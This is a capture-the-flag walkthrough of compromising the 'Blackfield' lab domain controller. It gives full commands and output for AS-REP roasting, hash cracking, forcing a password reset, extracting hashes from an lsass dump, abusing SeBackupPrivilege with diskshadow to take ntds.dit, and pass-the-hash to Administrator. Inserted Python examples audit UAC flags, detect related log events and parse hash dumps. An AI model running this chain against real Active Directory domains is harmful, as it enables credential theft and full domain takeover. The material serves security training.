Nmap scan

We begin by doing an nmap scan on the target IP (10.10.10.192).

**nmap -sCV -T4 --min-rate 10000 -v -oA nmap/tcp_default 10.10.10.192**
# Nmap 7.93 scan initiated Wed Nov 30 10:28:13 2022 as: nmap -sCV -T4 --min-rate 10000 -v -oA nmap/tcp_default 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up (0.025s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-30 22:28:20Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-11-30T22:28:26
|_ start_date: N/A
|_clock-skew: 6h59m59s

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 30 10:29:02 2022 -- 1 IP address (1 host up) scanned in 48.62 seconds

The above nmap scan shows that we are dealing with a Windows Active Directory server: Kerberos (88) and LDAP (389, 3268) are running, and the Service Info line names the host “DC01”, which stands for Domain Controller. The following information can be gathered from the nmap scan:

  • SMB is opened
  • LDAP is running
  • Domain = blackfield.local
  • DNS is running

After adding blackfield.local to the hosts file we can use dig to reveal DNS information.

Doing a dig for the domain

We can use dig to reveal DNS information about the domain

**dig any blackfield.local @10.10.10.192**
; <<>> DiG 9.18.8-1-Debian <<>> any blackfield.local @10.10.10.192
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12014
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;blackfield.local. IN ANY

;; ANSWER SECTION:
blackfield.local. 600 IN A 10.10.10.192
blackfield.local. 3600 IN NS **dc01.blackfield.local.**
blackfield.local. 3600 IN SOA **dc01.blackfield.local.** hostmaster.blackfield.local. 162 900 600 86400 3600

;; ADDITIONAL SECTION:
dc01.blackfield.local. 3600 IN A 10.10.10.192
dc01.blackfield.local. 3600 IN AAAA dead:beef::c1ed:d29f:1c64:2499

;; Query time: 20 msec
;; SERVER: 10.10.10.192#53(10.10.10.192) (TCP)
;; WHEN: Thu Dec 01 06:14:27 EST 2022
;; MSG SIZE rcvd: 171
  • We also add dc01.blackfield.local to the hosts file, because this is likely the FQDN of the Domain Controller.

Finding usernames in the profiles$ share

We will begin by taking a look at SMB running on port 445.

**smbclient -L \\10.10.10.192**
Sharename       Type      Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share

It is possible to list the shares anonymously, which suggests we may also be able to interact with them. Of these shares, only profiles$ allows us to list its contents anonymously:

**smbclient \\\\10.10.10.192\\profiles$**

There are a lot of profiles on the share, all of them directories. We can recursively download all of them using smbclient:

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

Next we can list the content of each directory using ls:

ls -la *

All directories are empty, but we now have a list of possible usernames for the DC. After some editing of the ls output, we have a list of 319 users.

cat tempusers.txt

--snipped--
XDebes
XKonegni
XRykiel
YBleasdale
YHuftalin
YKivlen
YKozlicki
YNyirenda
YPredestin
YSeturino
YSkoropada
YVonebers
YZarpentine
ZAlatti
ZKrenselewski
ZMalaab
ZMiick
ZScozzari
ZTimofeeff
ZWausik

AS-REP roasting the user list

AS-REP roasting is an attack against Kerberos accounts that do not require pre-authentication.

We can use impacket to check whether any users have this vulnerable option set on their account and, if so, obtain a hash that we can try to crack. We can also find valid usernames this way, because impacket reports which existing usernames do not have the pre-authentication option set.
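The directory-side view of the same check, as an added example that is not part of this write-up or of impacket: GetNPUsers asks the KDC for a TGT without pre-authentication, while an administrator auditing their own domain can instead look for the UF_DONT_REQUIRE_PREAUTH bit (0x400000) in each account's userAccountControl attribute. The account records below are constructed; the flag values are the documented Windows constants, and the LDAP filter uses the standard bitwise-AND matching rule.

```python
"""Find AS-REP-roastable accounts from their userAccountControl value.

Added example, not from the write-up or from impacket. The account records
are constructed; the flag constants are the documented Windows values.
"""

# userAccountControl bits relevant to this audit (documented Windows values).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

FLAG_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}


def decode_uac(value):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if value & bit]


def asrep_roastable(accounts):
    """Enabled accounts with DONT_REQUIRE_PREAUTH set, i.e. the ones GetNPUsers
    would report. Disabled accounts are skipped: the KDC refuses them anyway."""
    return sorted(
        a["sAMAccountName"]
        for a in accounts
        if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
        and not a["userAccountControl"] & UF_ACCOUNTDISABLE
    )


def ldap_filter_asrep():
    """LDAP filter for finding the same accounts directly in the directory
    (e.g. with ldapsearch). 1.2.840.113556.1.4.803 is the bitwise-AND
    matching rule; the flag is written in decimal (0x400000 = 4194304)."""
    return (
        "(&(objectClass=user)"
        f"(userAccountControl:1.2.840.113556.1.4.803:={UF_DONT_REQUIRE_PREAUTH}))"
    )


# Constructed records in the shape of an LDAP search result.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "support", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "audit2020", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_backup", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD},
    # Roastable flag set, but disabled: GetNPUsers would get an error for it.
    {"sAMAccountName": "old_kiosk", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
]

if __name__ == "__main__":
    for a in SAMPLE_ACCOUNTS:
        print(f'{a["sAMAccountName"]:<12} {decode_uac(a["userAccountControl"])}')
    print("AS-REP roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
    print("LDAP filter:", ldap_filter_asrep())
```

The filter string is what a defender would run periodically against the DC; clearing the bit on every account it returns removes the roasting surface, and any account that legitimately needs it should be on a watch list with a long random password.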

**impacket-GetNPUsers blackfield.local/ -usersfile tempusers.txt -request -format hashcat -outputfile hashes.txt**

This saves the hashes it finds to a file named hashes.txt in hashcat format.

We find one account, “support”, that does not require pre-authentication, which gives us its hash. Let’s try to crack the hash to get a password. But first, let’s see which other users are valid on the DC:

impacket-GetNPUsers blackfield.local/ -usersfile tempusers.txt -request -format hashcat -outputfile hashes.txt |
grep "User"

Because we grep for “User”, only the valid accounts are shown in the output:

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

This gives us a users.txt list of:

audit2020
svc_backup
support

Cracking the Kerberos hash

We can use hashcat to crack the Kerberos hash:

hashcat -a0 hashes.txt /usr/share/wordlists/rockyou.txt

The hash is cracked and the password for support is #00^BlackKnight.

Verifying credentials for support

We can use crackmapexec to verify the credentials:

crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'

We see a green [+], which means we can authenticate to SMB using the specified credentials.

Using python-bloodhound to find misconfigurations

We authenticate as support to LDAP using python-bloodhound to find misconfigurations in the domain:

bloodhound-python -d blackfield.local -u support -p '#00^BlackKnight' -ns 10.10.10.192 -c All

Clicking on the node info for the compromised user “support” shows one “First Degree Object Control” entry.

Clicking on it shows the following in BloodHound:

User support is able to “ForceChangePassword” on user audit2020. BloodHound says the following:

“_The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL‘s password without knowing that user’s current password._”


Changing password for user audit2020 using rpcclient

One way to exploit this is to use rpcclient to change the password of user audit2020, as described at https://malicious.link/post/2017/reset-ad-user-password-with-linux/

rpcclient -U support //10.10.10.192

After authenticating as user support, we can use “setuserinfo2” to change the password for audit2020:

rpcclient $> setuserinfo2 audit2020 23 Incendium123!

Verifying changed password for user audit2020

After changing the password for user audit2020 we verify it using crackmapexec:

crackmapexec smb 10.10.10.192 -u audit2020 -p Incendium123!

And indeed the password is changed. We can also list the SMB shares and the access that audit2020 has on each of them:

crackmapexec smb 10.10.10.192 -u audit2020 -p Incendium123! --shares
  • User audit2020 is also able to access the share “forensic”.

Finding memory dumps in forensic share

Let’s use smbclient once again, this time authenticating to the share “forensic” as user “audit2020”:

smbclient \\\\10.10.10.192\\forensic -U audit2020

There are three folders; one of them contains memory dumps as zip files:

  • One zip stands out: the lsass zip file. The Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. It also writes to the Windows Security Log.

This dump can contain the NTLM hashes of logged-on sessions, which we can use to authenticate to the DC.

We can use get to download the lsass.zip file to our local machine:

smb: \memory_analysis\> get lsass.zip

Dumping hashes using pypykatz

We first unzip the file, which gives us an lsass.DMP file.

We can use pypykatz to find hashes in this memory DMP file:

**pypykatz lsa minidump lsass.DMP | grep NT**

This gives us a list of hashes that we can use to authenticate. Remember that we still have one other user in mind: the svc_backup account that showed up as valid. We can check whether one of these session hashes is valid for that account using crackmapexec:

crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
  • Notice that we used winrm instead of smb. This is because BloodHound showed that user svc_backup is in the Remote Management group.

Privilege escalation to Administrator

We first authenticate with evil-winrm to the server as svc_backup:

evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

After authenticating, we will confirm our privileges:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
**SeBackupPrivilege Back up files and directories Enabled**
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
  • BloodHound also told us that svc_backup is a member of the “Backup Operators” group.

Exploiting the SeBackupPrivilege token

This privilege makes the system grant read access to any file regardless of its ACL (read only, not write). There are GitHub repos with scripts that exploit this privilege:

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug

Using evil-winrm we upload these two .dll files and import them:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload ./pe/SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeUtils.dll
  • This gives us the ability to copy files from anywhere on the system. For some reason, however, it is not able to get files from the Administrator desktop.

Using diskshadow to get the ntds.dit file

We want to get the ntds.dit file, which holds all the password hashes for the domain, so that we can authenticate as Administrator. We do this with a diskshadow script that creates a backup (shadow copy) of the C: drive and exposes it as a Z: drive that we have full control over. After that we download the ntds.dit file and use secretsdump to retrieve the hashes.

We will first need a script:

set context persistent nowriters
set metadata c:\programdata\df.cab
set verbose on
add volume c: alias df
create
expose %df% z:

This script creates a VSS shadow copy of the C: drive and mounts it as the Z: drive. The script needs DOS (CRLF) line endings for diskshadow to read it, so we convert it with unix2dos:

unix2dos script.txt

Next upload the script:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload pe/script.txt

And finally use diskshadow to execute the script:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt

It worked. Now we can change our directory to Z:/Windows/ntds and download the ntds.dit file to our local machine:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd Z:/Windows/ntds

We will also need the SYSTEM registry hive for secretsdump to retrieve the hashes:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system.bk
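Both the password reset performed with rpcclient earlier and the diskshadow / reg save steps of this section leave traces in the domain controller's Security log. The detection logic below is an added example, not part of the original post: it runs over constructed, simplified renderings of two event types. Event 4724 ("an attempt was made to reset an account's password") is logged when one account resets another account's password, as setuserinfo2 did for audit2020 (a user changing their own password is 4723 instead). Event 4688 ("a new process has been created", with command-line auditing enabled) records the diskshadow and reg save commands. The log lines, field names and the allow-list of helpdesk accounts are all assumptions made for the example.

```python
"""Detection over constructed Windows Security-log lines (added example).

Event 4724: one account resetting another account's password.
Event 4688: process creation with command line, matched against shadow-copy
and registry-hive-save patterns.
"""
import re

# Constructed, simplified event renderings: event id, then key=value pairs.
SAMPLE_LOG = r"""
4724 Subject=helpdesk01 Target=jdoe
4723 Subject=jdoe Target=jdoe
4724 Subject=support Target=audit2020
4688 Subject=svc_backup NewProcessName=C:\Windows\System32\diskshadow.exe CommandLine="diskshadow /s script.txt"
4688 Subject=svc_backup NewProcessName=C:\Windows\System32\reg.exe CommandLine="reg save hklm\system system.bk"
4688 Subject=jdoe NewProcessName=C:\Windows\System32\notepad.exe CommandLine="notepad.exe"
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Assumption: accounts that are expected to reset other users' passwords.
ALLOWED_RESETTERS = {"helpdesk01"}

# Command lines that create a shadow copy or save credential-bearing hives.
HIVE_OR_SHADOW_RE = [
    re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.I),             # scripted diskshadow run
    re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I),  # shadow copy via vssadmin
    re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(system|sam|security)\b", re.I),
]


def parse_events(text):
    """Turn the sample log into a list of dicts with an integer EventID."""
    events = []
    for line in text.strip().splitlines():
        event_id, _, rest = line.partition(" ")
        fields = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        fields["EventID"] = int(event_id)
        events.append(fields)
    return events


def password_resets_by_others(events, allowed=ALLOWED_RESETTERS):
    """4724 events where the resetting account is neither the target nor allow-listed."""
    return [
        e for e in events
        if e["EventID"] == 4724
        and e["Subject"].lower() != e["Target"].lower()
        and e["Subject"] not in allowed
    ]


def shadow_or_hive_processes(events):
    """4688 events whose command line matches a shadow-copy or hive-save pattern."""
    hits = []
    for e in events:
        if e["EventID"] != 4688:
            continue
        cmd = e.get("CommandLine", "")
        if any(p.search(cmd) for p in HIVE_OR_SHADOW_RE):
            hits.append((e["Subject"], cmd))
    return hits


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    for e in password_resets_by_others(evts):
        print(f'ALERT 4724: {e["Subject"]} reset the password of {e["Target"]}')
    for who, cmd in shadow_or_hive_processes(evts):
        print(f"ALERT 4688: {who} ran {cmd!r}")
```

The 4688 rule only fires if process command-line auditing is enabled on the DC; without it the event carries the image path but not the `/s script.txt` or `hklm\system` arguments the patterns key on. Both rules are low-volume on a domain controller, which is what makes a member of Backup Operators running diskshadow worth an alert rather than a dashboard entry.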

Using secretsdump to get all domain hashes

Now we can use secretsdump to get all of the domain hashes:

impacket-secretsdump -system system.bk -ntds ntds.dit LOCAL > domain_hashes.txt

There are a lot of hashes, but the interesting one is of course Administrator:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
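The secretsdump line format (name:rid:lm_hash:nt_hash:::) is worth being able to parse, because the same dump that gives an attacker the Administrator hash is what a defender reviews after a DC backup audit. The following is an added example, not part of the write-up or of impacket: it parses a dump in that format and reports accounts with an empty password, accounts that still store a real LM hash, and groups of accounts sharing one NT hash (password reuse). All hashes are constructed except the two well-known empty-password constants and the Administrator line copied from above; the status lines mimic secretsdump's output shape.

```python
"""Audit a secretsdump NTDS dump for weak credential hygiene (added example)."""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty/absent password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# Constructed dump in secretsdump's shape; Administrator line from the write-up.
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
svc_legacy:1105:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a:::
jdoe:1106:aad3b435b51404eeaad3b435b51404ee:abcdefabcdefabcdefabcdefabcdef01:::
jsmith:1107:aad3b435b51404eeaad3b435b51404ee:abcdefabcdefabcdefabcdefabcdef01:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""


def parse_secretsdump(text):
    """Return {name: {"rid", "lm", "nt"}} from the account lines, skipping
    impacket status lines and the Kerberos key lines that follow them."""
    accounts = {}
    for line in text.strip().splitlines():
        parts = line.split(":")
        if line.startswith("[") or len(parts) < 4 or not parts[1].isdigit():
            continue
        accounts[parts[0]] = {"rid": int(parts[1]), "lm": parts[2].lower(), "nt": parts[3].lower()}
    return accounts


def empty_passwords(accounts):
    """Accounts whose NT hash is that of the empty string."""
    return sorted(n for n, a in accounts.items() if a["nt"] == EMPTY_NT)


def lm_hashes_stored(accounts):
    """Accounts still storing a real LM hash: NoLMHash is off, or the password
    has not been changed since it was turned on."""
    return sorted(n for n, a in accounts.items() if a["lm"] != EMPTY_LM)


def shared_nt_hashes(accounts):
    """{nt_hash: [names]} for NT hashes used by more than one account,
    leaving out empty passwords, which are reported separately."""
    by_hash = defaultdict(list)
    for name, a in accounts.items():
        if a["nt"] != EMPTY_NT:
            by_hash[a["nt"]].append(name)
    return {h: sorted(names) for h, names in by_hash.items() if len(names) > 1}


if __name__ == "__main__":
    accts = parse_secretsdump(SAMPLE_DUMP)
    print("accounts parsed:", len(accts))
    print("empty password:", empty_passwords(accts))
    print("LM hash stored:", lm_hashes_stored(accts))
    for h, names in shared_nt_hashes(accts).items():
        print("shared NT hash", h, "->", names)
```

Parsing on the RID field being numeric is what separates the account lines from the Kerberos key lines (`name:aes256-cts-hmac-sha1-96:...`) that secretsdump prints after them. Machine accounts (names ending in `$`) are kept in the results on purpose: a reused hash on one of those is just as much a finding.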

Using evil-winrm to authenticate as Administrator:

evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee